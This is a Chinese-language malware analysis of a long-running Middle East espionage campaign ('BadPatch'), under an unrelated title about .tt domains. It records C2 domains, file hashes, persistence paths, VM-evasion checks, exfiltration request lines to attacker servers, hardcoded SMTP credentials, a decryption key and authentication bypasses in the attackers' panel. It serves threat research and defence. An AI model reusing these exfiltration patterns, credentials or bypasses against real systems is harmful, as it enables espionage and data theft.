tt域名是什么意思(tt后缀域名)

　　2017年4月，Palo AltoNetworks Unit 42与Clearsky合作，对一个针对中东地区的APT攻击活动展开调查，研究过程中发现攻击者使用了两种新的恶意软件家族：KASPERAGENT 和MICROPSIA。

　　从那时起，Unit42继续对已发现的C&C基础设施进行检测和研究，这使得他们有机会发现了另一个新的针对中东地区的APT攻击活动。在新发现的网络袭击中，攻击者使用了新的C&C、新的攻击方法和4种恶意软件（其中还包括Android恶意软件），此外还发现一个负责管理盗窃到的受害者数据的系统以及一些关于攻击者的细节。

　　值得注意的是，研究表明，这一新发现的攻击活动至少可以追溯到2012年6月，也就是说它们存在至少五年了。

　　本文将详细讲述新发现的APT活动的研究结果。

　　发现新的攻击活动

　　在之前针对KASPERAGENT 和MICROPSIA的研究中，发现了它们的一个C&C服务器，域名为：mailsinfo[.]com，从2015年5月中旬到2015年10月～11月期间，该域名对应的初始IP地址为148.251.135[.]117。

　　使用passive DNS（pDNS）搜索到这个IP对应的一个邮件服务器mail.pal4u[.]net on，该邮件服务器重2015年5月中旬被启用。这个IP地址还与其他一些服务器有关联，但我们并不认为它们一定与网络攻击活动有关联，因为这个IP似乎是与多个不想管的第三方共享的。不过，鉴于活动的特征和一些恶意软件的痕迹表明这个IP地址确实与Gaza黑客组织有关。

　　C&C基础设施

　　从pal4u [.]net的WHOIS结果来看，似乎是一个巴勒斯坦托管公司。查询www[.]pal4u [.]net的DNS记录，可以获知其主机名称服务器(NS)“NS1”和“NS2”的信息，以及一个额外的IP地址：195.154.216 [ .]74 。

　　此外，还发现了六个额外的域名，与palu4u[.]net的NS信息相同，它们曾使用过同一个IP地址（195.154.216[.]74），详情参见下图1。分析这7个域名，发现有6个被用作恶意软件的C&C服务器、数据渗露、恶意软件下载服务器，或者就是跟恶意代码相关的服务器，这六个域名的信息如下：

　　Pal4u[.]net

　　Pal2me[.]net

　　Pay2earn[.]net

　　Shop8d[.]net

　　Ts4shope[.]net

　　pal4news[.]net

　　只有一个域名（ads4market[.]net）似乎与恶意活动是不相关的。

图1 – C&C域名关联示意图

　　虽然是pal2me[.]net 和shop8d[.]net都能通过WHOIS查询到相关的历史记录，但通过分析这些注册信息，研究人员推测它们与ISP供应商有关，而非攻击者用于C&C的站点。

　　此外还发现攻击者使用了DNS RNAME“a.faris.live[.]com ”，但这似乎也是与ISP供应商有关，而非网站所有者。

　　在获知一系列可能与恶意软件C&C服务器相关的信息后，接下来开始研究攻击者使用的攻击方法和恶意软件的利用情况。

　　攻击方法

　　观察可知，使用这种基础设施的攻击者在攻击活动的初始阶段是通过鱼叉式网络钓鱼袭击受害者的。然而，从Gaza黑客组织相关的第一次活动开始，它就曾被发现利用过一个漏洞：CVE-2012-0158记录。攻击者使用RTF漏洞从被感染的Wordpress站点（wp.piedslibres[.]com/wp/wp-includes/js/Next.scr）下载windows恶意软件“BadPatch”。

SHA256值:d759dcbebee18a65fda434ba1da5d348c16d9d3775fe1652a1dacf983ffc93b8

　　第一次被发现的时间：2015-05-13

　　文件名：????????.doc（英文名称为：Developments.doc）

　　研究人员从第二个攻击活动的示例中发现攻击者利用了相同的漏洞，而且也是从受感染的服务器上下载同样的恶意软件。

SHA256值： 6660491190525a7413b683b91a6c8b0082aa71e6dd6291d11ec26e1e3cf55a57

　　第一次被发现的时间：2015-06-15

　　文件名：?????.doc（英文名称为Tasneem.doc–法塔赫的军事组织（巴勒斯坦的政治运动））

　　在大多数攻击活动中，恶意软件显示为一个空白的Microsoft Word诱饵文件，或一个带有错误消息的Microsoft Word文件：

“出现错误，请稍后再试您的请求”

这次的攻击活动与之前的相比也有一些变化。研究人员识别出的第一个恶意软件样本（编译时间为2012年6月12日），下发了一个Adobe Flash诱饵文件，其SHA256 值：92a685c0c8515ef55635760026039564ddd0b299a2b0c4812df3c40aba133812（如下图2所示）。

图2 - AdobeFlash诱饵文件

　　攻击者通常采用具有诱惑性的文件名向潜在目标发起钓鱼攻击：

　　恶意软件分析

　　研究人员在这次攻击活动中移动收集了148个恶意软件样本，根据已经识别的C&C服务器，将这些恶意软件样本分为以下四类：

Microsoft Visual Basic恶意软件–通过SMTP（端口26）和HTTP渗漏数据

AutoIt恶意软件–早期版本也使用SMTP，但主要是通过HTTP渗漏数据

Android恶意软件–通过HTTP渗漏数据（最早见于2015年12月）

　　MicrosoftVisual Basic恶意软件

　　感染时恶意软件会将自身复制到%appdata%microsoftmicrosoft [0-9]{9-15}dwm.exe（9-15数字是microsoft文件夹名称），并在系统启动文件夹内添加一个恶意软件的执行链接，完成持久化。

　　恶意软件采集的变量包括系统信息（操作系统、计算机名），键盘记录器输出，和浏览器记录的密码信息（从IE、Chrome和Firefox浏览器收集到的）。

　　键盘记录器和系统信息是通过HTTP POST渗漏的：

lms/getdata.php?myAction=add_line&macName=…$&computer_id=App.EXEName&mac_address=…&dns_domain=nnn&domain=bbb&content2=$FRESH:%20%20ESC%20pango2012ENTR&ver=3&mac_time=tt&patch_user_id=mgh2&patch_group_id=Label1(2).Caption

　　文件是通过SMTP（26端口）渗漏的，SMTP凭据被加密硬编码在恶意软件的代码中，一些邮箱的示例如下：

　　user: sender_b@pal4u[.]net

　　password: sender@123

　　ubuntu_net@pal4u[.]net

　　ubuntu_send@pal4u[.]net

图3 - SMTP加密设置

　　渗漏的文件列表会写入恶意软件文件“sysfiles .txt”中，每次成功窃取一个文件就会生成一个.done结尾的文件，如“1.done”。名为“mac.txt”的文件中，包含计算机的MAC地址，恶意文件代码中硬编码了一串待窃取的文件扩展名列表：

* .xls；*。xlsx；* PDF格式；* .mdb；* .rar；*邮编*。doc；* .docx

　　AutoIt恶意软件

　　2016年3月左右，攻击者开始从VisualBasic向AutoIt恶意软件转移，在竞选2016年3月左右移。AutoIt是一个使用类似BASIC脚本语言的免费软件,它设计用于Windows GUI(图形用户界面)中进行自动化操作，能够利用模拟键盘按键，鼠标移动和窗口/控件的组合来实现自动化任务。

　　该恶意软件使用W对象通过向“%appdata%MicrosoftWindowsStartMenuProgramsStartupMicrosoft.lnk”写入一个链接来实现持久性。

　　它利用一个WMI查询地盘驱动器的名称、BIOS和主板的信息，用以确定所处的运行环境是否是虚拟机（VM）：

检测是否存在“vboxservice. exe”、“vboxtray .exe”、“vmwaretray .exe”的进程

WMI查询Win32_DiskDrive，试图寻找“VBOXHARDDISK”、”QEMU HARDDISK”、”VMWARE VIRTUAL IDE HARD DRIVE”、“VMware Virtual SSCSI Disk Device”

WMI查询Win32_BIOS ，试图寻找“VboxBIOS version”

WMI查询Win32_Baseboard，试图寻找“VMware-stylemotherboard”、“440BX Desktop Reference Platform”，名称=”Base Board”

　　恶意软件删除Chrome和Firefox浏览器缓存的口令文件，要求用户重新输入网站的密码，从而有机会窃取这些账户凭据。

　　恶意软件可以通过Process ID或硬编码的名称执行杀死恶意软件进程的指令。

　　可以通过下载和执行较新的版本来实现自身的更新：

　　h__p://m103.pay2earn[.]net/public/versions/[“svchost” & $i& “.zip] (i=1～7).

　　新版本的恶意软件保存在%appdata%Microsoftupdtesvchost.scr。

　　环境数据通过POST渗漏

　　恶意软件通过执行一个WMI查询枚举系统上安装的安全产品。将数据存储在日志文件中：

　　特定攻击者的名称存储在：%appdata%Microsoftupdteusu.log

　　MAC地址存储在：%appdata%Microsoftupdtemac.log

　　错误记录存储在：%appdata%Microsoftupdtelog.log

　　操作系统版本和架构的信息通过HTTP POST被渗漏：

　　h__p://m103.pay2earn[.]net/devices/settings

　　/devices/settings?mac_address=<macAddress>&content=%20Start%20Downloader%20majdTest%201/2017Anti%20Type:%20%20%20OS%20Version%20=%20WIN_7%20|%20X64

　　h__p://m103.pay2earn[.]net/logs/new

　　/logs/new?name=<computerName>$&computer_id=App.EXEName&mac_address=<macAddress>&content=$%20Start%20Downloader%20%20majdTest%201/2017&patch_username=majd

　　通过SMTP渗漏截图信息

　　恶意软件会对受害者电脑进行截图，这些截图通过SMTP（26端口）被渗漏出去，如“GDIPlus_Image1.jpg” 、“GDIPlus_Image2.jpg”.

　　SMTP配置信息被保存为加密的RC4字符串，解密密码是：!@#$%^&*()，代码示例如下图所示：

　　图4 - SMTP RC4加密字符串（初始化）

　　邮件发送功能的代码示例如下：

图5 - SMTP邮件发送功能

　　电子邮件的发件地址和收件地址都位于同一个C&C服务器，示例如下：从C2服务器的电子邮件地址发送到同一服务器上的收件人地址。解密的例子：

　　smtpserver: m103.pay2earn[.]net

　　fromname: sn@m103.pay2earn[.]net

　　fromaddress: sn@m103.pay2earn[.]net

　　toaddress: asf@m103.pay2earn[.]net

　　username: sn@m103.pay2earn[.]net

　　password: sn_$_2016

　　研究人员观察到一个单独的变种使用了一个模糊化的AutoIt脚本（5c6e531738c1380ec09c1ec0f1438cee5077e6cbade8af87710b8be2f0aaaac7）；另一个独特的变化是键盘记录器，仅支持拦截阿拉伯语和英语（42adec426addf3fd0c6aff406b46fa82d901f5a9bed7758a243458961349a362）。

　　AutoIt下载器/滴管

　　这个简单的组件从C&C服务器（如pal4u[.]net 或m103.pay2earn[.]net）下载并执行恶意软件。

SHA256值： 2d75335f8c7d4e956dcd637f480c94f6ed49a9870375aad0eee1e651d6e7ac02

　　下载器样本也显示为一个诱饵文件（bbb .docx）：

SHA 256值： 2d75335f8c7d4e956dcd637f480c94f6ed49a9870375aad0eee1e651d6e7ac02

　　Android恶意软件

　　攻击者们也没有放过从受害目标的Android设备上收集数据的机会。

　　除了更新恶意软件的功能外，样本中提取到的Android恶意软件还能收集并渗漏设备上的文件、短信、语音通话信息，也可使用设备远程记录声音或视频。（在另外一篇文章中将对此做详细描述）

　　受害者的档案管理系统

　　攻击者开发了一套定制的系统来管理：“????????????????”（“档案管理系统”），专门用来管理从受害者处获取到的数据，服务器登录开通了双因素认证（2FA）。

图6 – RMS系统的登录界面

图7- RMS系统登录时需短信验证（2FA）

　　研究人员分析发现了RMS系统在登录环节的漏洞，如果直接导航到“sms.php”页面，将绕过账号密码认证，直接进入SMS验证页面；如果直接导航到“/lms/index.php”，将绕过系统的认证，得以访问系统的后台信息。

图8 –档案管理系统

　　下图中列举了2016年3月时服务器中所记录的受害者的情况：

图9-受害者的国家分布情况

　　此外，由于这项攻击活动的性质，受害者的总数并不多，在某些情况下攻击者似乎也感染了他们自己的测试机器，如下图10所示：

图10 -测试日志

　　攻击者的信息

　　通过一些样本使用的文件名称、Microsoft Visual项目目录名称和HTTP POST参数等信息，研究人员认为这些袭击活动可能与一个官方的间谍组织Gaza Bureau有关联。

　　S:shwork files from shaaban4shopfiles tajasshop8dProject1.vbp

　　C:Documents and SettingsHADJYOUB.HADJ-1065B94515BureaucmProject1.vbp

　　观察到的可能是昵称的字符串包括：

Shaaban, Hadjyoub, OMR, mgh2, rashed, Shady, majd , f2b,jno, ajr , hmg, vip, 2ta, asf, h2m, mag

　　恶意软件的名称命名

　　攻击者似乎给这个恶意软件命名为“Patch”（“补丁”的意思）：

“2014-03-17exegazaProject1.vbp”

　　V:BatchVersions

　　在阿拉伯语中，“p”和“b”发音相似，经常会导致B / P的拼写错误。

　　嵌入的字符串：

“Old – update patchand check anti-virus.. ”

　　“PatchNotExit– Check Version”

　　“PatchNotExit– download now”

　　“PatchNotExit– Version Patch“

　　服务器通信参数：

lms/getdata.php?myAction=add_line&macName=…$&computer_id=App.EXEName&mac_address=…&dns_domain=nnn&domain=bbb&content2=$FRESH:%20%20ESC%20pango2012ENTR&ver=3&mac_time=tt&patch_user_id=mgh2&patch_group_id=Label1(2).Caption

　　“patch_user_id”参数似乎指代受害者的序号。

　　活跃时间

　　研究人员观察到的时间最久的样本的编译日期为2012年6月12日，与此样本有关的C&C服务器（pal2me[.]net）也是在同一天登记的，这表明，这项攻击活动已经持续了至少五年时间了，且一直延续如今。

　　恶意样本在不断发展中

　　上文中提到最古老的样本支持使用电子邮件传递受害者的数据：

SHA256值： 92a685c0c8515ef55635760026039564ddd0b299a2b0c4812df3c40aba133812

C:UsersShadyDesktoponlyemailwith slideshowProject1.vbp

　　具有键盘记录器功能的版本：

SHA256值：106deff16a93c4a4624fe96e3274e1432921c56d5a430834775e5b98861c00ea

E:work hereready klsend recent filesProject1.vbp

　　新的键盘记录器版本：

SHA256值： 17a4126fb1fb19885d78c82271464d82af8618b7d1b7d8901666c1121ddb2ba1

D:000 work21.3 GBnewSpoofKLProject1.vbp

　　新的文件渗漏测试版本：

SHA256值： 9a8acd988089e7f9dd04f971374f766db519e854d42e8052b0d98b4c9c6b67e4

Y:My WorkVB 6Get FilesGFiles14-09-2015 – Working tst onlyProject1.vbp

　　Visual Basic版本（新的下载器）：

SHA256值： 224b5af4ca4de234f03408487f075f0d638826cb6f65944a3e8dcbaac4372e79

Q:newPatchdownloaderexe siteshopProject1.vbp

　　下载器（2.8版）：

　　SHA256值： d906118fb36a0cc4e83121d4d606ad685645252e8e0791f793057499d8751bf0

J:dowloader 2 8downloadersiteProject1.vbp

　　M103版本，指向目前仍在线的C&C服务器：m103.pay2earn[.]net。该服务器的注册日期是2016年2月8日，恶意软件的编译日期是2016年3月31日。

SHA256值： d9253c808d83ace06f885479e0807246a29cb9967ea0d0855f5a3802825b13dbSHA256

W:newPatchexe vb m10330 3 2016Project1.vbp

　　结论

　　对之前发现的袭击活动相关基础设施锲而不舍的持续观察，交叉验证主机信息，才有机会再第一时间发现一个先前未知的袭击活动，进而发现它使用的基础设施、相关的恶意软件，以及利用的漏洞信息。

　　这次袭击活动中的恶意软件和C&C相对而言比较间谍，从档案管理系统获取到的信息来看，攻击者窃取的数据具有很强的针对性。这群攻击者已经存在了至少五年之久，并且仍在活动中，尽管他们比较低调。